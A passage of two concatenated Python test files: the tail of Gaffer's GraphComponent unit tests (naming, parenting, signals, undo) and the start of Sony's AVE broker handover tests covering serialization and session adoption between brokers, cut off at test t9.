GraphComponentTest.previousParent = previousParent
c = child.parentChangedSignal().connect( f )
GraphComponentTest.newParent = "XXX"
GraphComponentTest.previousParent = "XXX"
w = weakref.ref( parent )
del parent
while gc.collect() :
pass
IECore.RefCounted.collectGarbage()
self.assertEqual( w(), None )
self.failUnless( GraphComponentTest.newParent is None )
self.failUnless( GraphComponentTest.previousParent is None )
def testReparentingDoesntSignal( self ) :
"""Adding a child to a parent who already owns that child should do nothing."""
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
parent.addChild( child )
self.assert_( child.parent().isSame( parent ) )
GraphComponentTest.numSignals = 0
def f( a, b=None ) :
GraphComponentTest.numSignals += 1
c1 = child.parentChangedSignal().connect( f )
c2 = parent.childAddedSignal().connect( f )
parent.addChild( child )
self.assertEqual( GraphComponentTest.numSignals, 0 )
def testMany( self ) :
l = []
for i in range( 0, 100000 ) :
l.append( Gaffer.GraphComponent() )
def testDictionarySemantics( self ) :
# check setitem and getitem
p = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
p["c"] = c
self.assert_( p.getChild( "c" ).isSame( c ) )
self.assert_( p["c"].isSame( c ) )
self.assertRaises( KeyError, p.__getitem__, "notAChild" )
# check that setitem removes items with clashing names
c2 = Gaffer.GraphComponent()
p["c"] = c2
self.assert_( p.getChild( "c" ).isSame( c2 ) )
self.assert_( c2.parent().isSame( p ) )
self.assert_( c.parent() is None )
# check delitem
c3 = Gaffer.GraphComponent()
p["c3"] = c3
self.assert_( p.getChild( "c3" ).isSame( c3 ) )
self.assert_( p["c3"].isSame( c3 ) )
self.assert_( "c3" in p )
del p["c3"]
self.assert_( not "c3" in p )
self.assertRaises( KeyError, p.__delitem__, "xxxx" )
def testUniqueNaming( self ) :
p = Gaffer.GraphComponent()
c1 = Gaffer.GraphComponent()
c2 = Gaffer.GraphComponent()
c3 = Gaffer.GraphComponent()
c1.setName( "a" )
c2.setName( "a" )
c3.setName( "a" )
p.addChild( c1 )
self.assertEqual( c1.getName(), "a" )
p.addChild( c2 )
self.assertEqual( c2.getName(), "a1" )
p.addChild( c3 )
self.assertEqual( c3.getName(), "a2" )
c4 = Gaffer.GraphComponent( "a1" )
p.addChild( c4 )
self.assertEqual( c4.getName(), "a3" )
c1.setName( "b" )
c2.setName( "b" )
c3.setName( "b" )
c4.setName( "b" )
self.assertEqual( c1.getName(), "b" )
self.assertEqual( c2.getName(), "b1" )
self.assertEqual( c3.getName(), "b2" )
self.assertEqual( c4.getName(), "b3" )
def testParallelUniqueNaming( self ):
# At one point setName was using a non-threadsafe static formatter which would throw
# exceptions when used from multiple threads
def f( q ) :
try:
g = Gaffer.GraphComponent()
for i in range( 500 ):
g.addChild( Gaffer.GraphComponent( "a" ) )
self.assertEqual( set(g.keys()), set( [ "a" ] + [ "a%i" % i for i in range( 1, 500 ) ] ) )
except Exception as e:
q.put( e )
threads = []
q = Queue.Queue()
for i in range( 0, 500 ) :
t = threading.Thread( target = f, args = (q,) )
t.start()
threads.append( t )
for t in threads :
t.join()
if not q.empty():
raise q.get( False )
def testAncestor( self ) :
a = Gaffer.ApplicationRoot()
s = Gaffer.ScriptNode()
a["scripts"]["one"] = s
n = GafferTest.AddNode()
s["node"] = n
self.assert_( n.ancestor( Gaffer.ScriptNode ).isSame( s ) )
self.assert_( n.ancestor( Gaffer.ApplicationRoot ).isSame( a ) )
def testCommonAncestor( self ) :
a = Gaffer.ApplicationRoot()
s = Gaffer.ScriptNode()
a["scripts"]["one"] = s
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
self.assert_( s["n1"].commonAncestor( s["n2"], Gaffer.ScriptNode ).isSame( s ) )
self.assert_( s["n2"].commonAncestor( s["n1"], Gaffer.ScriptNode ).isSame( s ) )
def testCommonAncestorType( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["user"]["p1"] = Gaffer.IntPlug()
s["n"]["user"]["p2"] = Gaffer.Color3fPlug()
self.assertEqual( s["n"]["user"]["p1"].commonAncestor( s["n"]["user"]["p2"]["r"] ), s["n"]["user"] )
self.assertEqual( s["n"]["user"]["p1"].commonAncestor( s["n"]["user"]["p2"]["r"], Gaffer.Plug ), s["n"]["user"] )
self.assertEqual( s["n"]["user"]["p1"].commonAncestor( s["n"]["user"]["p2"]["r"], Gaffer.Node ), s["n"] )
def testRenameThenRemove( self ) :
p = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
p.addChild( c )
c.setName( "c" )
p.removeChild( c )
def testDescendant( self ) :
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
p3 = Gaffer.GraphComponent()
p1["p2"] = p2
p2["p3"] = p3
self.failUnless( p1.descendant( "p2" ).isSame( p2 ) )
self.failUnless( p1.descendant( "p2.p3" ).isSame( p3 ) )
def testNameConstraints( self ) :
n = Gaffer.GraphComponent()
for name in ( "0", "0a", "@A", "a.A", ".", "A:", "a|", "a(" ) :
self.assertRaises( Exception, n.setName, name )
self.assertRaises( Exception, Gaffer.GraphComponent, name )
for name in ( "hello", "_1", "brdf_0_degree_refl" ) :
n.setName( name )
def testContains( self ) :
n = Gaffer.GraphComponent()
self.failIf( "c" in n )
n["c"] = Gaffer.GraphComponent()
self.failUnless( "c" in n )
def testIsAncestorOf( self ) :
n = Gaffer.GraphComponent()
n["c"] = Gaffer.GraphComponent()
n["c"]["c"] = Gaffer.GraphComponent()
n2 = Gaffer.GraphComponent()
self.failUnless( n.isAncestorOf( n["c"]["c"] ) )
self.failUnless( n.isAncestorOf( n["c"] ) )
self.failIf( n.isAncestorOf( n ) )
self.failIf( n2.isAncestorOf( n ) )
self.failIf( n.isAncestorOf( n2 ) )
def testDerivingInPython( self ) :
class TestGraphComponent( Gaffer.GraphComponent ) :
def __init__( self, name = "TestGraphComponent" ) :
Gaffer.GraphComponent.__init__( self, name )
self.acceptsChildCalled = False
self.acceptsParentCalled = False
def acceptsChild( self, potentialChild ) :
self.acceptsChildCalled = True
return isinstance( potentialChild, TestGraphComponent )
def acceptsParent( self, potentialParent ) :
self.acceptsParentCalled = True
return isinstance( potentialParent, TestGraphComponent )
IECore.registerRunTimeTyped( TestGraphComponent )
# check names in constructors
g1 = TestGraphComponent()
self.assertEqual( g1.getName(), "TestGraphComponent" )
g2 = TestGraphComponent( "g" )
self.assertEqual( g2.getName(), "g" )
# check calling virtual overrides directly
self.assertEqual( g1.acceptsChildCalled, False )
self.assertEqual( g1.acceptsParentCalled, False )
self.assertEqual( g2.acceptsChildCalled, False )
self.assertEqual( g2.acceptsParentCalled, False )
self.failUnless( g1.acceptsChild( g2 ) )
self.failUnless( g1.acceptsParent( g2 ) )
self.failIf( g1.acceptsChild( Gaffer.Node() ) )
self.failIf( g1.acceptsParent( Gaffer.Node() ) )
self.assertEqual( g1.acceptsChildCalled, True )
self.assertEqual( g1.acceptsParentCalled, True )
self.assertEqual( g2.acceptsChildCalled, False )
self.assertEqual( g2.acceptsParentCalled, False )
# check calling virtual overrides indirectly through C++
g1 = TestGraphComponent()
g2 = TestGraphComponent( "g" )
self.assertEqual( g1.acceptsChildCalled, False )
self.assertEqual( g1.acceptsParentCalled, False )
self.assertRaises( RuntimeError, g1.addChild, Gaffer.Node() )
self.assertEqual( g1.acceptsChildCalled, True )
self.assertEqual( g1.acceptsParentCalled, False )
self.assertRaises( RuntimeError, Gaffer.GraphComponent().addChild, g1 )
self.assertEqual( g1.acceptsChildCalled, True )
self.assertEqual( g1.acceptsParentCalled, True )
def testLen( self ) :
g = Gaffer.GraphComponent()
self.assertEqual( len( g ), 0 )
g["a"] = Gaffer.GraphComponent()
self.assertEqual( len( g ), 1 )
g["b"] = Gaffer.GraphComponent()
self.assertEqual( len( g ), 2 )
del g["a"]
self.assertEqual( len( g ), 1 )
def testSetChild( self ) :
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c1 = Gaffer.GraphComponent()
c2 = Gaffer.GraphComponent()
self.assertEqual( len( p1 ), 0 )
self.assertEqual( len( p2 ), 0 )
self.assertEqual( c1.parent(), None )
self.assertEqual( c2.parent(), None )
p1.setChild( "a", c1 )
self.assertEqual( c1.getName(), "a" )
self.assertEqual( c1.parent(), p1 )
self.assertEqual( len( p1 ), 1 )
p1.setChild( "a", c2 )
self.assertEqual( c1.getName(), "a" )
self.assertEqual( c2.getName(), "a" )
self.assertEqual( c1.parent(), None )
self.assertEqual( c2.parent(), p1 )
self.assertEqual( len( p1 ), 1 )
p2.setChild( "b", c2 )
self.assertEqual( c2.getName(), "b" )
self.assertEqual( c2.parent(), p2 )
self.assertEqual( len( p1 ), 0 )
self.assertEqual( len( p2 ), 1 )
def testSetChildAgain( self ) :
# Setting a child to the same thing should
# cause nothing to happen and no signals to
# be triggered.
parent = Gaffer.GraphComponent()
child = Gaffer.GraphComponent()
parent.setChild( "c", child )
self.assert_( child.parent().isSame( parent ) )
GraphComponentTest.numSignals = 0
def f( *args ) :
GraphComponentTest.numSignals += 1
c1 = child.parentChangedSignal().connect( f )
c2 = parent.childAddedSignal().connect( f )
c3 = parent.childRemovedSignal().connect( f )
c4 = child.nameChangedSignal().connect( f )
parent.setChild( "c", child )
self.assertEqual( GraphComponentTest.numSignals, 0 )
def testEmptyName( self ) :
g = Gaffer.GraphComponent()
self.assertRaises( RuntimeError, g.setName, "" )
def testGetChildWithEmptyName( self ) :
g = Gaffer.GraphComponent()
self.assertEqual( g.getChild( "" ), None )
self.assertRaises( KeyError, g.__getitem__, "" )
def testKeysAndValuesAndItems( self ) :
g = Gaffer.GraphComponent()
self.assertEqual( g.keys(), [] )
self.assertEqual( g.values(), [] )
g["a"] = Gaffer.GraphComponent()
g["b"] = Gaffer.GraphComponent()
g["c"] = Gaffer.GraphComponent()
self.assertEqual( g.keys(), [ "a", "b", "c" ] )
self.assertEqual( len( g.values() ), 3 )
self.assertEqual( g.values()[0].getName(), "a" )
self.assertEqual( g.values()[1].getName(), "b" )
self.assertEqual( g.values()[2].getName(), "c" )
items = g.items()
self.assertEqual( len( items ), 3 )
self.assertEqual( items[0][0], "a" )
self.assertEqual( items[1][0], "b" )
self.assertEqual( items[2][0], "c" )
self.assertEqual( items[0][1].getName(), "a" )
self.assertEqual( items[1][1].getName(), "b" )
self.assertEqual( items[2][1].getName(), "c" )
def testIndexByIndex( self ) :
g = Gaffer.GraphComponent()
g["a"] = Gaffer.GraphComponent()
g["b"] = Gaffer.GraphComponent()
g["c"] = Gaffer.GraphComponent()
self.assertEqual( len( g ), 3 )
self.assertRaises( IndexError, g.__getitem__, 3 )
self.assertRaises( IndexError, g.__getitem__, -4 )
self.assertEqual( g[0].getName(), "a" )
self.assertEqual( g[1].getName(), "b" )
self.assertEqual( g[2].getName(), "c" )
self.assertEqual( g[-1].getName(), "c" )
self.assertEqual( g[-2].getName(), "b" )
self.assertEqual( g[-3].getName(), "a" )
def testChildrenByType( self ) :
g = Gaffer.Node()
g["a"] = Gaffer.IntPlug()
g["b"] = Gaffer.Plug()
g["c"] = Gaffer.Node()
self.assertEqual( len( g.children() ), 4 )
self.assertEqual( len( g.children( Gaffer.GraphComponent ) ), 4 )
self.assertEqual( len( g.children( Gaffer.Plug ) ), 3 )
self.assertEqual( len( g.children( Gaffer.Node ) ), 1 )
self.assertEqual( len( g.children( Gaffer.IntPlug ) ), 1 )
def testRemoveMany( self ) :
g = Gaffer.GraphComponent()
l = []
for i in range( 0, 10000 ) :
c = Gaffer.GraphComponent()
l.append( c )
g["c%d"%i] = c
for c in l :
g.removeChild( c )
def testManyChildrenWithSameInitialName( self ) :
g = Gaffer.GraphComponent()
for i in range( 0, 2000 ) :
g.addChild( Gaffer.GraphComponent() )
for index, child in enumerate( g ) :
if index == 0 :
self.assertEqual( child.getName(), "GraphComponent" )
else :
self.assertEqual( child.getName(), "GraphComponent%d" % index )
def testNamesWithStrangeSuffixes( self ) :
g = Gaffer.GraphComponent()
g.addChild( Gaffer.GraphComponent( "a" ) )
g.addChild( Gaffer.GraphComponent( "a1somethingElse" ) )
self.assertEqual( g[0].getName(), "a" )
self.assertEqual( g[1].getName(), "a1somethingElse" )
g.addChild( Gaffer.GraphComponent( "a" ) )
self.assertEqual( g[2].getName(), "a1" )
def testAddChildWithExistingNumericSuffix( self ) :
g = Gaffer.GraphComponent()
g.addChild( Gaffer.GraphComponent( "a1" ) )
g.addChild( Gaffer.GraphComponent( "a1" ) )
self.assertEqual( g[0].getName(), "a1" )
self.assertEqual( g[1].getName(), "a2" )
def testSetChildDoesntRemoveChildIfNewChildIsntAccepted( self ) :
class AddNodeAcceptor( Gaffer.Node ) :
def __init__( self, name = "AddNodeAcceptor" ) :
Gaffer.Node.__init__( self, name )
def acceptsChild( self, potentialChild ) :
return isinstance( potentialChild, GafferTest.AddNode )
IECore.registerRunTimeTyped( AddNodeAcceptor )
g = AddNodeAcceptor()
a = GafferTest.AddNode()
g["a"] = a
self.assertRaises( RuntimeError, g.setChild, "a", GafferTest.MultiplyNode() )
self.assertTrue( g["a"].isSame( a ) )
def testCircularParentingThrows( self ) :
a = Gaffer.GraphComponent()
b = Gaffer.GraphComponent()
a["b"] = b
self.assertRaises( RuntimeError, b.addChild, a )
a = Gaffer.GraphComponent()
b = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
a["b"] = b
b["c"] = c
self.assertRaises( RuntimeError, c.addChild, a )
a = Gaffer.GraphComponent()
self.assertRaises( RuntimeError, a.addChild, a )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed(
Gaffer,
# Ignore the names imported from GafferCortex and
# GafferDispatch into the Gaffer namespace - they're
# just for backwards compatibility.
namesToIgnore = set( [
"GafferCortex::ObjectReader",
"GafferCortex::ObjectWriter",
"GafferCortex::ExecutableOpHolder",
"GafferCortex::OpHolder",
"GafferCortex::ParameterisedHolderNode",
"GafferCortex::ParameterisedHolderDependencyNode",
"GafferCortex::ParameterisedHolderComputeNode",
"GafferCortex::ParameterisedHolderTaskNode",
"GafferCortex::AttributeCachePath",
"GafferCortex::ClassLoaderPath",
"GafferCortex::IndexedIOPath",
"GafferCortex::ParameterPath",
"GafferDispatch::Dispatcher",
"GafferDispatch::LocalDispatcher",
"GafferDispatch::TaskNode",
"GafferDispatch::PythonCommand",
"GafferDispatch::SystemCommand",
"GafferDispatch::TaskContextProcessor",
"GafferDispatch::TaskContextVariables",
"GafferDispatch::TaskList",
"GafferDispatch::TaskSwitch",
"GafferDispatch::Wedge",
"GafferDispatch::FrameMask",
] )
)
self.assertTypeNamesArePrefixed( GafferTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( Gaffer )
self.assertDefaultNamesAreCorrect( GafferTest )
def testClearChildren( self ) :
p = Gaffer.GraphComponent()
for i in range( 0, 10 ) :
p.addChild( Gaffer.GraphComponent() )
self.assertEqual( len( p ), 10 )
p.clearChildren()
self.assertEqual( len( p ), 0 )
def testParentChanging( self ) :
class Child( Gaffer.GraphComponent ) :
def __init__( self, name = "Child" ) :
Gaffer.GraphComponent.__init__( self, name )
self.parentChanges = []
def _parentChanging( self, newParent ) :
self.parentChanges.append( ( self.parent(), newParent ) )
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c = Child()
self.assertEqual( len( c.parentChanges ), 0 )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p1.removeChild( c )
self.assertEqual( len( c.parentChanges ), 2 )
self.assertEqual( c.parentChanges[-1], ( p1, None ) )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 3 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p2.addChild( c )
self.assertEqual( len( c.parentChanges ), 4 )
self.assertEqual( c.parentChanges[-1], ( p1, p2 ) )
# cause a parent change by destroying the parent.
# we need to remove all references to the parent to do
# this, including those stored in the parentChanges list.
del p2
del c.parentChanges[:]
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, None ) )
def testDescriptiveKeyErrors( self ) :
g = Gaffer.GraphComponent()
self.assertRaisesRegexp( KeyError, "'a' is not a child of 'GraphComponent'", g.__getitem__, "a" )
self.assertRaisesRegexp( KeyError, "'a' is not a child of 'GraphComponent'", g.__delitem__, "a" )
def testNoneIsNotAString( self ) :
g = Gaffer.GraphComponent()
self.assertRaises( TypeError, g.getChild, None )
self.assertRaises( TypeError, g.__getitem__, None )
self.assertRaises( TypeError, g.__delitem__, None )
self.assertRaises( TypeError, g.descendant, None )
self.assertRaises( TypeError, g.__contains__, None )
self.assertRaises( TypeError, g.setName, None )
def testDelItemByIndex( self ) :
g = Gaffer.GraphComponent()
a = Gaffer.GraphComponent( "a" )
b = Gaffer.GraphComponent( "b" )
g["a"] = a
g["b"] = b
self.assertEqual( a.parent(), g )
self.assertEqual( b.parent(), g )
del g[0]
self.assertEqual( a.parent(), None )
self.assertEqual( b.parent(), g )
def testRemoveChildUndoIndices( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
a = Gaffer.Plug( "a" )
b = Gaffer.Plug( "b" )
c = Gaffer.Plug( "c" )
s["n"]["user"].addChild( a )
s["n"]["user"].addChild( b )
s["n"]["user"].addChild( c )
def assertPreconditions() :
self.assertEqual( len( s["n"]["user"] ), 3 )
self.assertEqual( s["n"]["user"][0], a )
self.assertEqual( s["n"]["user"][1], b )
self.assertEqual( s["n"]["user"][2], c )
assertPreconditions()
with Gaffer.UndoScope( s ) :
del s["n"]["user"]["b"]
def assertPostConditions() :
self.assertEqual( len( s["n"]["user"] ), 2 )
self.assertEqual( s["n"]["user"][0], a )
self.assertEqual( s["n"]["user"][1], c )
assertPostConditions()
s.undo()
assertPreconditions()
s.redo()
assertPostConditions()
s.undo()
assertPreconditions()
def testMoveChildUndoIndices( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
a = Gaffer.Plug( "a" )
b = Gaffer.Plug( "b" )
c = Gaffer.Plug( "c" )
s["n1"]["user"].addChild( a )
s["n1"]["user"].addChild( b )
s["n1"]["user"].addChild( c )
def assertPreconditions() :
self.assertEqual( len( s["n1"]["user"] ), 3 )
self.assertEqual( s["n1"]["user"][0], a )
self.assertEqual( s["n1"]["user"][1], b )
self.assertEqual( s["n1"]["user"][2], c )
self.assertEqual( len( s["n2"]["user"] ), 0 )
assertPreconditions()
with Gaffer.UndoScope( s ) :
s["n2"]["user"].addChild( s["n1"]["user"]["b"] )
def assertPostConditions() :
self.assertEqual( len( s["n1"]["user"] ), 2 )
self.assertEqual( s["n1"]["user"][0], a )
self.assertEqual( s["n1"]["user"][1], c )
self.assertEqual( len( s["n2"]["user"] ), 1 )
self.assertEqual( s["n2"]["user"][0], b )
assertPostConditions()
s.undo()
assertPreconditions()
s.redo()
assertPostConditions()
s.undo()
assertPreconditions()
def testParentChangedOverride( self ) :
class Child( Gaffer.GraphComponent ) :
def __init__( self, name = "Child" ) :
Gaffer.GraphComponent.__init__( self, name )
self.parentChanges = []
def _parentChanged( self, oldParent ) :
self.parentChanges.append( ( oldParent, self.parent() ) )
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c = Child()
self.assertEqual( len( c.parentChanges ), 0 )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p1.removeChild( c )
self.assertEqual( len( c.parentChanges ), 2 )
self.assertEqual( c.parentChanges[-1], ( p1, None ) )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 3 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p2.addChild( c )
self.assertEqual( len( c.parentChanges ), 4 )
self.assertEqual( c.parentChanges[-1], ( p1, p2 ) )
# Cause a parent change by destroying the parent.
# We need to remove all references to the parent to do
# this, including those stored in the parentChanges list.
del p2
del c.parentChanges[:]
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, None ) )
@GafferTest.TestRunner.PerformanceTestMethod()
def testMakeNamesUnique( self ) :
s = Gaffer.ScriptNode()
for i in range( 0, 1000 ) :
n = GafferTest.AddNode()
s.addChild( n )
@GafferTest.TestRunner.PerformanceTestMethod()
def testGetChild( self ) :
s = Gaffer.ScriptNode()
for i in range( 0, 1000 ) :
# explicitly setting the name to something unique
# avoids the overhead incurred by the example
# in testMakeNamesUnique
n = GafferTest.AddNode( "AddNode" + str( i ) )
s.addChild( n )
for i in range( 0, 1000 ) :
n = "AddNode" + str( i )
c = s[n]
self.assertEqual( c.getName(), n )
def testNoneIsNotAGraphComponent( self ) :
g = Gaffer.GraphComponent()
with self.assertRaisesRegexp( Exception, r"did not match C\+\+ signature" ) :
g.addChild( None )
with self.assertRaisesRegexp( Exception, r"did not match C\+\+ signature" ) :
g.setChild( "x", None )
with self.assertRaisesRegexp( Exception, r"did not match C\+\+ signature" ) :
g.removeChild( None )
def testRanges( self ) :
g = Gaffer.GraphComponent()
g["c1"] = Gaffer.GraphComponent()
g["c2"] = Gaffer.GraphComponent()
g["c2"]["gc1"] = Gaffer.GraphComponent()
g["c3"] = Gaffer.GraphComponent()
g["c3"]["gc2"] = Gaffer.GraphComponent()
g["c3"]["gc3"] = Gaffer.GraphComponent()
self.assertEqual(
list( Gaffer.GraphComponent.Range( g ) ),
[ g["c1"], g["c2"], g["c3"] ],
)
self.assertEqual(
list( Gaffer.GraphComponent.RecursiveRange( g ) ),
[ g["c1"], g["c2"], g["c2"]["gc1"], g["c3"], g["c3"]["gc2"], g["c3"]["gc3"] ],
)
if __name__ == "__main__":
unittest.main()
|
handover.py | # Copyright (C) 2013 Sony Mobile Communications AB.
# All rights, including trade secret rights, reserved.
import json
import time
import traceback
from ave.network.process import Process
from ave.network.exceptions import *
from ave.broker._broker import validate_serialized, RemoteBroker, Broker
from ave.broker.session import RemoteSession
from ave.broker.exceptions import *
import setup
# check that a broker with trivial allocations can have its state serialized
@setup.brokers([],'master',[],False,False)
def t1(HOME, master):
pretty = '%s t1' % __file__
print(pretty)
try:
s = master.serialize()
except Exception, e:
print('FAIL %s: trivial serialization failed: %s' % (pretty, str(e)))
return False
try:
validate_serialized(s)
except Exception, e:
print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
return False
return True
# like t1 but with some allocations
@setup.brokers([],'master',[],False,False)
def t2(HOME, master):
pretty = '%s t2' % __file__
print(pretty)
c1 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
c1.get_resources({'type':'handset'}, {'type':'workspace'})
c2 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
c2.get_resources({'type':'handset'}, {'type':'relay'})
try:
s = master.serialize()
except Exception, e:
print('FAIL %s: trivial serialization failed: %s' % (pretty, str(e)))
return False
try:
validate_serialized(s)
except Exception, e:
print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
return False
return True
# trivial handover between two brokers: no allocations. more or less just check
# that the takeover can be started on the same port as the handover and that
# configuration data is the same
@setup.factory()
def t3(factory):
pretty = '%s t3' % __file__
print(pretty)
handover = factory.make_master('master')
adoption,config,fdtx_path = handover.begin_handover() # stops listening
try:
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
except Exception, e:
print('FAIL %s: could not start takeover: %s' % (pretty, str(e)))
return False
try:
handover.end_handover(1)
except ConnectionClosed:
pass
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, str(e)))
return False
# compare the config and serialization of the two
c = takeover.get_config()
if c != config:
print('FAIL %s: configuration mismatch: %s != %s' % (pretty, c, config))
return False
return True
# make a few allocations, then handover. check that both brokers show the same
# availability of equipment
@setup.factory()
def t4(factory):
pretty = '%s t4' % __file__
print(pretty)
handover = factory.make_master('master')
avail_1 = handover.list_available()
# make some allocations
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
# hand over
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# check that availability is correct. stop the sessions started against the
# handover and check that the resources become available in the takeover
result = takeover.list_available()
if len(result) != len(avail_3):
print('FAIL %s: wrong avail 3: %s != %s' % (pretty, result, avail_3))
return False
ok = False
del(c2)
for i in range(10): # allow some time for brokers to detect session death
result = takeover.list_available()
if len(result) == len(avail_2):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong avail 2: %s != %s' % (pretty, result, avail_2))
return False
ok = False
del(c1)
for i in range(10): # allow some time for brokers to detect session death
result = takeover.list_available()
if len(result) == len(avail_1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong avail 1: %s != %s' % (pretty, result, avail_2))
return False
return True
# kill off one of the original sessions during the handover and check that the
# associated resources become available in the takeover
@setup.factory()
def t5(factory):
pretty = '%s t5' % __file__
print(pretty)
handover = factory.make_master('master')
avail_1 = handover.list_available()
# make some allocations
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
adoption,config,fdtx_path = handover.begin_handover()
session = RemoteSession(h2.address, h2.authkey)
try:
session.crash() # kill the second session during the handover
except ConnectionClosed:
pass
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
result = takeover.list_available()
if len(result) != len(avail_2):
print('FAIL %s: wrong avail: %s != %s' % (pretty, result, avail_2))
return False
return True
# make sure one of the sessions is super busy during the handover so that it
# cannot engage in communication with the takeover during session adoption
@setup.factory()
def t6(factory):
pretty = '%s t6' % __file__
print(pretty)
handover = factory.make_master('master')
avail = handover.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
w.run('sleep 3') # right, extremely busy, but it prevents other action
while True:
time.sleep(1) # don't let client die and loose all resources
p = Process(target=oob_client, args=(handover.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(handover.list_available()) != len(avail):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: catastrophic' % pretty)
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
result = True
if len(takeover.list_available()) == len(avail):
print('FAIL %s: wrong avail: %s' % (pretty, avail))
result = False
p.terminate()
p.join()
return result
# check that resources of super busy sessions are reclaimed when the session
# finally dies
@setup.factory()
def t7(factory):
pretty = '%s t7' % __file__
print(pretty)
handover = factory.make_master('master')
avail = handover.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
w.run('sleep 2') # right, extremely busy, but it prevents other action
p = Process(target=oob_client, args=(handover.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(handover.list_available()) != len(avail):
ok = True
break
time.sleep(0.1)
if not ok:
print('FAIL %s: catastrophic' % pretty)
p.terminate()
p.join()
return False
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# now wait for the client to die, so that its session dies, so that
# the takeover detects this, so that the associated resouces can be reclaimed,
# so that the takeover's availability is the same as when we started
ok = False
for i in range(10):
if len(takeover.list_available()) == len(avail):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: super busy session not tracked correctly' % pretty)
p.terminate()
p.join()
return ok
# check that sessions survive multiple broker restarts
@setup.factory()
def t8(factory):
pretty = '%s t8' % __file__
print(pretty)
original = factory.make_master('master')
avail = original.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
while True:
time.sleep(1)
p = Process(target=oob_client, args=(original.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(original.list_available()) != len(avail):
ok = True
break
time.sleep(0.1)
if not ok:
print('FAIL %s: catastrophic' % pretty)
p.terminate()
p.join()
return False
# do two handovers in a row
adoption,config,fdtx_path = original.begin_handover()
interim = factory.make_takeover('master', adoption, config, fdtx_path)
original.end_handover(1)
adoption,config,fdtx_path = interim.begin_handover()
final = factory.make_takeover('master', adoption, config, fdtx_path)
interim.end_handover(1)
# check that all brokers have the same availability
a1 = original.list_available()
a2 = interim.list_available()
a3 = final.list_available()
if len(a1) != len(a2) != len(a3):
print(
'FAIL %s: a handover failed somewhere: %s != %s != %s'
% (pretty, a1, a2, a3)
)
p.terminate()
p.join()
return False
# kill the client so that the brokers reclaim the equipment
p.terminate()
p.join()
ok = False
for i in range(10):
a3 = final.list_available()
if len(a3) == len(avail):
ok = True
break
if not ok:
print(
'FAIL %s: wrong availability: %d %d %d %d'
% (pretty, len(a1), len(a2), len(a3), len(avail))
)
return False
# check that the original and interim brokers have terminated now that they
# don't have any sessions with allocations
try:
original.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
try:
interim.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
# check that clients still attached to the handover get Restarting exceptions
# when they try to allocate after the handover has been done. this *can* be
# fixed so that clients migrate automatically, but it is difficult and I would
# prefer to not implement it unless there a strong case can be made for it
@setup.factory()
def t9(factory):
pretty = '%s t9' % __file__
